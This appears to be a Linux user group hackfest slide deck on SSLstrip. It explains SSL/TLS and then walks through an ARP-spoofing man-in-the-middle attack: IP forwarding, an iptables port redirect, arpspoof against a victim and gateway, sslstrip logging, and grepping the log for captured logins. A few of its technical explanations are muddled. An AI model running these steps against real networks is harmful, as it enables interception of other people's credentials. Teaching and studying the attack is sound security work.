SSLstrip

SSLstrip

SSLstrip

Presented by:Brian Fields "AZ_RUNE" <[email protected]>http://arizonarune.blogspot.com/

Brought to you by: PLUG – Phoenix Linux User Group's Hackfest

Courtesy of: Lisa Kachold <[email protected]>http://www.obnosis.com

SSLstrip

Covered Topics: What is SSLstrip? How does it work? What occurs when it is active? What does it mean to network security? Some steps to proactively defend against it.

SSLstrip

What is SSLstrip Before we can understand why and how to ”strip”

something we should know why and how it's implemented.

What is SSL & TLS? Where did SSL/TLS come from? Why are SSL/TLS used? How can secure protocols be built upon

unsecure protocols?

SSLstrip

What is SSL & TLS? SSL stands for Secure Sockets Layer, though

I.E.T.F. (Internet Engineering Task Force) has renamed it TLS (Transport Layer Security). TLS is documented in RFC 2246 and identifies itself in the protocol version field as SSL 3.1.

SSLstrip

Where did SSL/TLS come from? SSL was developed by Netscape, and is used

extensively by web browsers & crawlers to provide secure connections for transferring sensitive data, such as credit card numbers and login authentication. An SSL-protected HTTP transfer uses trusted port 443 (instead of HTTP's normal port 80), and is identified with a special URL method ”https.” Thus, https://mail.google.com/ would cause an SSL-enabled browser to open a secure SSL session to trusted port 443 at mail.google.com.

SSLstrip

Where did SSL/TLS come from? ”Trusted Ports?”

This is one of the first security patterns implemented on the internet, via ”r” or remote programs. The idea is that all ports below 1024 were assigned ONLY to system processes. This means remote connections were trusted because if the port was below 1024 it was a system process and not a user/client. This affects layer 4 ”Transport” of the OSI-Model and the protocols involved were TCP and UDP. It should be noted that this is an old process for security that modern encryption has replaced via SSH.

SSLstrip

Why are SSL/TLS used? In a word: cryptography, this is the foundation for

most modern security protocols. When an SSL session is established, the server begins by sending a non-encrypted public key to the client, so both parties (and any eavesdropper) can read this key. However, the client then transmits a randomn 46 bytes (based on PKCS) of data back to the server in a way that no one else could decode. Only the server, with its private key, can decode the information to determine the 46 original bytes. This shared secret is now used to generate a set of cipher keys (based on RC4 or ARC4) to encrypt the remainder of the session.

SSLstrip

Why are SSL/TLS used? (cont.)

These key were embedded in the authentication certificates (called X.509 certificates) which allowed a server to authenticate a client when it presented its certificate that had the key within its contents. Once the server verified the two certificates as matching the authentication is complete.

Wait if all this works so well then why are we talking about SSLstrip?

SSLstrip

How can secure protocols be built upon unsecure protocols?

In a nutshell – they cannot be built upon them without leaving a way for them to be circumvented.

This is where SSLstrip comes into use with a MITM (Man In The Middle) attack after exploiting a chosen subnet.

By the way almost all of you have been victim to a spoofing attack. Oh yes and they were legal attacks, 100% legal!

SSLstrip

How does it work?

SSLstrip

How does it work? The picture does a decent job of explaining the flow

of how SSLstrip works. Now in the next few slides I will explain how this works step by step and at the end there's an embedded mp4 going over the concepts discussed in the coming slides.

SSLstrip

What occurs when it is active? First, we have some requirements that have to be

done if we are to use SSLstrip. An Internet Connection Victim has to be on the same subnet A Linux computer

BT4 has the following features on a Live Disc. SSLstrip http://www.thoughtcrime.org/software/sslstrip/

ARPspoof Ettercap

(this is only necessary if you don't want

to run 'cat' for sslstrip.log)

SSLstrip

What occurs when it is active? Second, now that we have the requirements we

have to have a victim on the same subnet. In this example we have gained access to the

network and we are setting up shop to intercep SSL traffic. Now access could have been through a pen test or completely open access (i.e.: wifi at a University campus, Starbucks, etc.).

Now open terminal Either change to root or be prepared to 'sudo' these

commands.

SSLstrip

What occurs when it is active? tar zxvf sslstrip-0.6.tar.gz cd sslstrip-0.6

(optional) python ./setup.py install If you have BT4 the next set of tools are already on

the live disk. Othewise use your package manager and download ettercap and dsniff (has arpspoof).

The IP address we will arpspoof in the demo video is 172.16.30.132. The Default Gateway will be 172.16.30.2 and we will be acting as the Default Gateway for this MITM (Man In The Middle) attack.

SSLstrip

What occurs when it is active? On to setup: echo ”1” > /proc/sys/net/ipv4/ip_forward

Turns spoofing system into a router. Iptables -t nat -A PREROUTING -p tcp --destination-port 80

-j REDIRECT --to-port 8080 Tells all traffic on port 80 to head over to 8080

so

we can monitor all the information and strip SSL.

SSLstrip

What occurs when it is active? arpspoof -i eth0 -t 172.16.30.132 172.16.30.2

Allows our system to become any IP on the

local network. Allows us to send unsolicited

arp responses. Once running it will say the

Default Gateway is ”our” mac address. python ./sslstrip.py -a -l 8080

-a tells sslstrip to log all SSL and HTTP traffic.

-l 8080 tells it to listen on port 8080.

SSLstrip

What occurs when it is active? At this point our system is logging traffic and we can

still go on the web for example: http://www.example.com/ however if we go to Gmail and check the address bar we will notice what should have been https is only http. Try logging into mail with a dummy login and password. While you won't get in it will log the info you used in the attempt.

Dummy login: pauldotcom12345 Dummy password: password12345

SSLstrip

What occurs when it is active? At this point we are going to check the log file to

see what has come up. cat sslstrip.log | grep pauldotcom12345

When the log displays in terminal you will see a bunch of different information. Keep looking for you will see the dummy login and password you used.

SSLstrip

What does it mean to Network Security? If you are a penetration tester MITM attacks need to

be a tactic you are aware of to spot and use. Remember the legitimate use I mentioned earlier for arpspoofing?

User education on things your network users need to pay attention to. Don't treat your users like new users or that is all they will ever be. Be careful trying to lock them down or you will likely find SSH tunnels leaving your network.

SSLstrip

Some steps to proactively defend against it. If you are a penetration tester remember that port

scanning and exploit are not the only skills you need. Learning how to creatively exploit what you gain access to will allow you to plan better safeguards and keep unwanted traffic out.

If your users are properly educated then they can be an extra layer of security because they will be invested in the security of the network like you are.

Run regular checks and scans and read your logs. Vigilence will pay off, for the lazy admin is the hacked admin.

SSLstrip

Thanks to Pauldotcom.com for this demo: Below is the embedded mp4 file.

If it won't play go to: http://www.youtube.com/watch?v=xWBeQ0cR0WY

Refrence Sources / Bibliogrophy

Freesoft.orghttp://www.freesoft.org/CIE/Topics/146.htm http://www.freesoft.org/CIE/Topics/121.htm

IETF – Internet Engineering Task Forcehttp://www.ietf.org

Moxie Marlinspikehttp://www.thoughtcrime.org/software/sslstrip/

Wikipediahttp://en.wikipedia.org/wiki/ARP_spoofing